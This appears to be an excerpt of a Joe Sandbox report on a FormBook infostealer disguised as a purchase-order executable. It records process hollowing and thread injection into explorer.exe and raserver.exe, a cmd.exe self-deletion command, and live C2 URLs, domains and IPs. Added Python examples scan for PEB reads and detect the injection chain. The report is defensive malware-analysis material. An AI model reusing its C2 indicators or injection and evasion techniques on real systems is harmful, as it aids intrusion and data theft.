          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04853540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04883D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047D2D8A mov eax, dword ptr fs:[00000030h] (5 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0486FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047FAE73 mov eax, dword ptr fs:[00000030h] (5 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048A0EA5 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h] (6 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04818EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0488FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047DC600 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04808E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04891608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe  Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Memory allocated: page read and write | page guard
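The `mov eax, dword ptr fs:[00000030h]` entries listed above are the report's evidence for "Contains functionality to read the PEB". MSBuild.exe from the 32-bit Framework directory and raserver.exe from SysWOW64 are both 32-bit processes; in a 32-bit process fs points at the TEB, offset 0x30 of the TEB holds the PEB pointer, and the PEB is where PEB.BeingDebugged (offset 2) and PEB.Ldr (offset 0x0C, the module list used to resolve APIs without an import table) live. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it scans a raw 32-bit code buffer for the two common encodings of that instruction (the `A1` moffs32 form the disassembly shows, and the `8B /r` ModRM form used for registers other than eax) and tallies the hits by TEB field. The byte buffer is constructed for the demo and the base address is arbitrary.

```python
"""Find TEB/PEB reads (mov r32, dword ptr fs:[disp32]) in raw 32-bit x86 code.

Added example, not part of the Joe Sandbox report or of the analysed sample.
"""
import re
from typing import Dict, List, Tuple

# Register names indexed by the 3-bit "reg" field of a ModRM byte.
_REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# TEB fields that anti-analysis and import-free API resolution read via fs:.
_TEB_FIELDS = {
    0x18: "TEB.Self",
    0x30: "TEB.ProcessEnvironmentBlock",
}

# Two encodings of "mov r32, dword ptr fs:[disp32]":
#   64 A1 <disp32>           mov eax, fs:[disp32]   (moffs32 form, eax only)
#   64 8B <modrm> <disp32>   mov r32, fs:[disp32]   (ModRM mod=00 rm=101 => disp32)
_FS_LOAD = re.compile(
    rb"\x64(?:\xA1(?P<moff>.{4})"
    rb"|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])(?P<disp>.{4}))",
    re.DOTALL,
)


def find_fs_reads(code: bytes, base: int = 0) -> List[Tuple[int, str, int]]:
    """Return (address, register, fs offset) for each fs:[disp32] load in code."""
    hits: List[Tuple[int, str, int]] = []
    for m in _FS_LOAD.finditer(code):
        if m.group("moff") is not None:
            reg, disp = "eax", m.group("moff")
        else:
            reg = _REG32[(m.group("modrm")[0] >> 3) & 7]
            disp = m.group("disp")
        hits.append((base + m.start(), reg, int.from_bytes(disp, "little")))
    return hits


def tally_by_field(code: bytes) -> Dict[str, int]:
    """Count fs loads per TEB field; unknown offsets are reported as fs:[0x..]."""
    counts: Dict[str, int] = {}
    for _, _, off in find_fs_reads(code):
        key = _TEB_FIELDS.get(off, f"fs:[0x{off:X}]")
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample bytes: a BeingDebugged check plus two more fs loads.
#   64 A1 30 00 00 00      mov eax, dword ptr fs:[30h]   ; eax = PEB
#   0F B6 40 02            movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
#   85 C0                  test eax, eax
#   64 8B 0D 30 00 00 00   mov ecx, dword ptr fs:[30h]   ; ModRM form
#   64 A1 18 00 00 00      mov eax, dword ptr fs:[18h]   ; TEB.Self
#   90 C3                  nop / ret
SAMPLE_CODE = bytes.fromhex(
    "64A130000000" "0FB64002" "85C0" "648B0D30000000" "64A118000000" "90C3"
)

if __name__ == "__main__":
    # Base address chosen to mimic the report's function naming; it is arbitrary.
    for addr, reg, off in find_fs_reads(SAMPLE_CODE, base=0x015A4496):
        print(f"{addr:08X}  mov {reg}, dword ptr fs:[{off:08X}h]")
    print(tally_by_field(SAMPLE_CODE))
```

A byte-pattern scan is a triage heuristic, not a disassembler: 0x64 can occur inside data or as the tail of another instruction, so confirm hits in a disassembler before reporting them. The per-function grouping the report shows comes from that disassembly step, and the hit counts it attaches to functions such as 1_2_015A4496 are what this tally approximates.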

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe  Network Connect: 204.188.203.155 80
          Source: C:\Windows\explorer.exe  Network Connect: 104.161.26.87 80
          Source: C:\Windows\explorer.exe  Network Connect: 185.201.11.126 80
          Source: C:\Windows\explorer.exe  Network Connect: 3.127.175.50 80
          Source: C:\Windows\explorer.exe  Network Connect: 45.194.171.26 80
          Source: C:\Windows\explorer.exe  Network Connect: 13.224.93.48 80
          Source: C:\Windows\explorer.exe  Network Connect: 192.155.168.14 80
          Source: C:\Windows\explorer.exe  Network Connect: 52.71.133.130 80
          Source: C:\Windows\explorer.exe  Network Connect: 81.169.145.95 80
          Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe  Network Connect: 198.54.117.211 80
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write (2 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\raserver.exe  Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: CC0000
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\SysWOW64\raserver.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmp  Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmp  Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000003.00000002.522024966.0000000001128000.00000004.00000020.sdmp  Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Queries volume information: C:\Users\user\Desktop\Purchase Order 40,7045$.exe VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
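The entries in this section describe one injection chain: the dropper on the Desktop starts MSBuild.exe from the 32-bit Framework directory; MSBuild.exe maps execute-read-write sections into explorer.exe and raserver.exe, unmaps raserver.exe's original image at base CC0000 (the hollowing step), sets a thread context in process 3472 and queues an APC into explorer.exe; explorer.exe then opens the eleven TCP/80 connections listed first; and raserver.exe ends by running cmd.exe /c del on the MSBuild.exe path. The Python below is an added example, not from the Joe Sandbox report or from the FormBook authors: it writes each observable step as a rule over Sysmon-shaped events (EventID 1 process create, 3 network connect, 10 process access) and runs the rules over a constructed event list. Field names follow Sysmon's schema. The image paths, the cmd.exe command line, PID 3472 and the two destination addresses are taken from this report (the report does not say which image PID 3472 is; the sample events treat it as explorer.exe), while the GrantedAccess masks and the two benign control events are made up.

```python
"""Rules for the MSBuild.exe -> explorer.exe / raserver.exe injection chain.

Added example; not from the Joe Sandbox report or from the FormBook authors.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Windows images that have no business opening outbound TCP sessions from a
# workstation.  explorer.exe and raserver.exe are the two the report shows
# doing so after code was written into them.
NO_EGRESS_IMAGES = {
    r"c:\windows\explorer.exe",
    r"c:\windows\syswow64\raserver.exe",
}

# Process access rights (winnt.h) that writing a payload into another process
# requires, whether by mapping a section or by WriteProcessMemory.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE


@dataclass
class Event:
    """Sysmon-shaped event: EventID plus its string fields (names as in Sysmon)."""
    event_id: int
    fields: Dict[str, str]


def _name(path: str) -> str:
    """Lower-cased basename of an image path, used for comparisons and output."""
    return path.lower().rsplit("\\", 1)[-1]


def triage(events: Iterable[Event]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for events matching the chain in the report."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        f = ev.fields
        if ev.event_id == 1:  # process create
            image, parent = _name(f["Image"]), f.get("ParentImage", "")
            cmd = f.get("CommandLine", "")
            # MSBuild.exe is a build tool; a parent under \Users\ is a dropped loader.
            if image == "msbuild.exe" and "\\users\\" in parent.lower():
                alerts.append(("lolbin_from_user_dir", f"{_name(parent)} started msbuild.exe"))
            # "cmd /c del <path under C:\Windows>" is the clean-up step the report records.
            if image == "cmd.exe" and "/c del" in cmd.lower() and "c:\\windows\\" in cmd.lower():
                alerts.append(("delete_system_binary", f"{_name(parent)} ran {cmd}"))
        elif ev.event_id == 3 and f["Image"].lower() in NO_EGRESS_IMAGES:  # network connect
            alerts.append(("net_from_system_process",
                           f"{_name(f['Image'])} -> {f['DestinationIp']}:{f['DestinationPort']}"))
        elif ev.event_id == 10:  # process access (handle opened on another process)
            granted = int(f["GrantedAccess"], 16)
            if (granted & INJECT_MASK) == INJECT_MASK and _name(f["SourceImage"]) != _name(f["TargetImage"]):
                alerts.append(("process_access_inject",
                               f"{_name(f['SourceImage'])} -> {_name(f['TargetImage'])} pid {f['TargetProcessId']}"))
    return alerts


MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
EXPLORER = r"C:\Windows\explorer.exe"
RASERVER = r"C:\Windows\SysWOW64\raserver.exe"

# Constructed events in the order the report's chain happens.  Paths, PID and
# the two IPs come from the report; access masks and the two benign controls
# (firefox.exe egress, dotnet.exe starting MSBuild.exe, csrss.exe opening a
# query-only handle) are made up.
SAMPLE_EVENTS = [
    Event(1, {"Image": MSBUILD, "CommandLine": MSBUILD,
              "ParentImage": r"C:\Users\user\Desktop\Purchase Order 40,7045$.exe"}),
    Event(10, {"SourceImage": MSBUILD, "TargetImage": EXPLORER,
               "TargetProcessId": "3472", "GrantedAccess": "0x1FFFFF"}),
    Event(3, {"Image": EXPLORER, "DestinationIp": "81.169.145.95", "DestinationPort": "80"}),
    Event(3, {"Image": EXPLORER, "DestinationIp": "192.155.168.14", "DestinationPort": "80"}),
    Event(3, {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
              "DestinationIp": "203.0.113.10", "DestinationPort": "443"}),
    Event(1, {"Image": r"C:\Windows\SysWOW64\cmd.exe", "ParentImage": RASERVER,
              "CommandLine": "cmd.exe /c del '" + MSBUILD + "'"}),
    Event(1, {"Image": MSBUILD, "ParentImage": r"C:\Program Files\dotnet\dotnet.exe",
              "CommandLine": MSBUILD + " build.proj"}),
    Event(10, {"SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": EXPLORER,
               "TargetProcessId": "3472", "GrantedAccess": "0x1000"}),  # QUERY_LIMITED_INFORMATION
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:24} {detail}")
```

Sysmon does not log NtQueueApcThread or SetThreadContext themselves; the process-access event carrying PROCESS_VM_OPERATION and PROCESS_VM_WRITE is the reliable precursor, because the payload has to be written into the target before any thread can be pointed at it. That mask also matches debuggers and some security agents opening handles, so exclude those images explicitly rather than loosening the mask, and treat the egress rule as a per-host baseline: explorer.exe does talk to Microsoft endpoints on some builds, which is why the report's own verdict rests on the injection evidence and not on the connections alone.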

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match  File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match  File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Techniques per tactic column; numbers in parentheses are the superscript counts shown next to a technique in the original matrix.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Shared Modules (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection (512); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (3); Disable or Modify Tools (1); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12)
          Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); System Information Discovery (112); System Owner/User Discovery; Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Input Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel (12); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 321389
          Sample: Purchase Order 40,7045$.exe
          Start date: 21/11/2020
          Architecture: WINDOWS
          Score: 100
          Top-level DNS/IP: g.msn.com
          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures

          Process tree as drawn in the graph:
          Purchase Order 40,7045$.exe (started)
            dropped file: C:\Users\...\Purchase Order 40,7045$.exe.log, ASCII
            -> MSBuild.exe (started)
                 signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
                 -> explorer.exe (injected)
                      DNS/IP: forbigdogs.com 81.169.145.95:80 (local port 49757), STRATOSTRATOAGDE, Germany; www.lotoencasa.com 192.155.168.14:80 (local port 49752), PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL, United States; 21 other IPs or domains
                      signature: System process connects to network (likely due to code injection or exploit)
                      -> raserver.exe (started)
                           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                           -> cmd.exe (started)
                                -> conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Purchase Order 40,7045$.exe | 19% | ReversingLabs | Win32.Trojan.Wacatac
Purchase Order 40,7045$.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.allan-wren.com/igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.justsoldbykristen.com/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.thoughtslate.com/igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.rockinglifefromhome.com/igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 | 100% | Avira URL Cloud | malware
http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 | 100% | Avira URL Cloud | malware
http://www.chemtradent.com/igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.theoutdoorbed.com/igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.pasumaisangam.com/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.guidesgold.net/igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.erpsystem.site/igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sweetbasilmarketing.com/igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe
http://www.lotoencasa.com/igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
theoutdoorbed.com | 34.102.136.180 | true | true | - | unknown
www.pasumaisangam.com | 3.127.175.50 | true | true | - | unknown
parking.namesilo.com | 204.188.203.155 | true | false | - | high
sweetbasilmarketing.com | 185.201.11.126 | true | true | - | unknown
parkingpage.namecheap.com | 198.54.117.211 | true | false | - | high
allmm.info | 34.102.136.180 | true | true | - | unknown
www.chemtradent.com | 45.194.171.26 | true | true | - | unknown
forbigdogs.com | 81.169.145.95 | true | true | - | unknown
www.justsoldbykristen.com | 52.71.133.130 | true | true | - | unknown
www.lotoencasa.com | 192.155.168.14 | true | true | - | unknown
www.ariasu-nakanokaikei.com | 13.224.93.48 | true | true | - | unknown
rockinglifefromhome.com | 34.102.136.180 | true | true | - | unknown
www.allan-wren.com | 104.161.26.87 | true | true | - | unknown
erpsystem.site | 34.102.136.180 | true | true | - | unknown
www.rockinglifefromhome.com | unknown | unknown | true | - | unknown
www.guidesgold.net | unknown | unknown | true | - | unknown
www.erpsystem.site | unknown | unknown | true | - | unknown
www.thoughtslate.com | unknown | unknown | true | - | unknown
www.allmm.info | unknown | unknown | true | - | unknown
www.indorebodybilaspur.com | unknown | unknown | true | - | unknown
www.forbigdogs.com | unknown | unknown | true | - | unknown
g.msn.com | unknown | unknown | false | - | high
www.theoutdoorbed.com | unknown | unknown | true | - | unknown
www.sweetbasilmarketing.com | unknown | unknown | true | - | unknown

                                                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.allan-wren.com/igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.justsoldbykristen.com/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.thoughtslate.com/igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.rockinglifefromhome.com/igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
